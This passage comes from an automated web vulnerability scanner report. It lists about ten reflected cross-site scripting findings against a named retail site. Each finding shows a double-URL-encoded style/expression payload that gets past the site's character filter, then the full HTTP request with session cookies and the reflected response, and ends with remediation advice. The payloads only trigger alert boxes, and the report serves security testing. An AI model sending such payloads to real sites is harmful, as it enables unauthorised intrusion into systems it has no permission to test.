This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /book_covers?c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:23 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1222437526:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=954
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100201


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Book Covers</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175964&c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab=1&c755e'style='x:expression(alert(1))'f5f16d43fab=1&c755e%27style%3d%27x%3aexpression%28alert%281%29%29%27f5f16d43fab=1&fromsla=T'>
...[SNIP]...

2.174. http://www.turnerlicensing.com/box_calendars [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /box_calendars

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45e75'style='x:expression(alert(1))'5e5156453d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /box_calendars?45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:22 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1666338165:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=997
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100396


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Box Calendars</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=338446&45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d=1&fromsla=T&45e75'style='x:expression(alert(1))'5e5156453d=1&45e75%27style%3d%27x%3aexpression%28alert%281%29%29%275e5156453d=1'>
...[SNIP]...

2.175. http://www.turnerlicensing.com/composition_books [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /composition_books

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68ea5'style='x:expression(alert(1))'2936e399c82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /composition_books?68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -259193890:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=592
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100546


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Composition Books</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175955&68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82=1&68ea5'style='x:expression(alert(1))'2936e399c82=1&68ea5%27style%3d%27x%3aexpression%28alert%281%29%29%272936e399c82=1&fromsla=T'>
...[SNIP]...

2.176. http://www.turnerlicensing.com/desk_calendars [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /desk_calendars

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6de83'style='x:expression(alert(1))'5840fdf7ac4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /desk_calendars?6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:28 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2001985876:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=978
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100232


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Desk Calendars</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=338397&6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4=1&6de83'style='x:expression(alert(1))'5840fdf7ac4=1&fromsla=T&6de83%27style%3d%27x%3aexpression%28alert%281%29%29%275840fdf7ac4=1'>
...[SNIP]...

2.177. http://www.turnerlicensing.com/home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6ece'style='x:expression(alert(1))'0391ff654b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /home?b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:50:58 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:50:58 GMT
NS_RTIMER_COMPOSITE: 1114175657:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=997
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 41742


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Homepage - Turner</title>


<meta name=...robots... content=...NOODP,NOYDIR...>
<script language='JavaScript'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=1&b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2=1&fromsla=T&b6ece'style='x:expression(alert(1))'0391ff654b2=1&b6ece%27style%3d%27x%3aexpression%28alert%281%29%29%270391ff654b2=1'>
...[SNIP]...

2.178. http://www.turnerlicensing.com/magnetic_to-do_notes [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /magnetic_to-do_notes

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea298'style='x:expression(alert(1))'3a5ce7edc7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /magnetic_to-do_notes?ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -811349489:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=800
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100729


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Magnetic To-Do Notes</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=262182&ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c=1&ea298'style='x:expression(alert(1))'3a5ce7edc7c=1&fromsla=T&ea298%27style%3d%27x%3aexpression%28alert%281%29%29%273a5ce7edc7c=1'>
...[SNIP]...

2.179. http://www.turnerlicensing.com/memo_books [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /memo_books

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70115'style='x:expression(alert(1))'e817eec67bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /memo_books?70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:32 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -811347759:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=894
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100245


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Memo Books</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
erlicensing.com/s.nl?category=175951&70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd=1&fromsla=T&70115%27style%3d%27x%3aexpression%28alert%281%29%29%27e817eec67bd=1&70115'style='x:expression(alert(1))'e817eec67bd=1'>
...[SNIP]...

2.180. http://www.turnerlicensing.com/nondated_combo_packs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /nondated_combo_packs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1120'style='x:expression(alert(1))'8f5f8e675c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /nondated_combo_packs?d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:35 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 778540437:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=822
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100037


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Nondated Combo Packs</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175958&d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5=1&fromsla=T&d1120'style='x:expression(alert(1))'8f5f8e675c5=1&d1120%27style%3d%27x%3aexpression%28alert%281%29%29%278f5f8e675c5=1'>
...[SNIP]...

2.181. http://www.turnerlicensing.com/paper_and_desk_caddy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /paper_and_desk_caddy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 524ea'style='x:expression(alert(1))'08e0d4230be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /paper_and_desk_caddy?524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:32 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 226384085:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=875
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 76479


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Paper & Desk Caddy</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175960&524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be=1&524ea'style='x:expression(alert(1))'08e0d4230be=1&524ea%27style%3d%27x%3aexpression%28alert%281%29%29%2708e0d4230be=1&fromsla=T'>
...[SNIP]...

2.182. http://www.turnerlicensing.com/paper_cubes [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /paper_cubes

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b6f7'style='x:expression(alert(1))'57f8f7591a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /paper_cubes?1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:40 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2034792773:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=894
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100156


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Paper Cubes</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script
...[SNIP]...
erlicensing.com/s.nl?category=175961&1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8=1&1b6f7%27style%3d%27x%3aexpression%28alert%281%29%29%2757f8f7591a8=1&fromsla=T&1b6f7'style='x:expression(alert(1))'57f8f7591a8=1'>
...[SNIP]...

2.183. http://www.turnerlicensing.com/portfolios [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /portfolios

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f0f7'style='x:expression(alert(1))'b5a9e77cfd5 in the application's response.

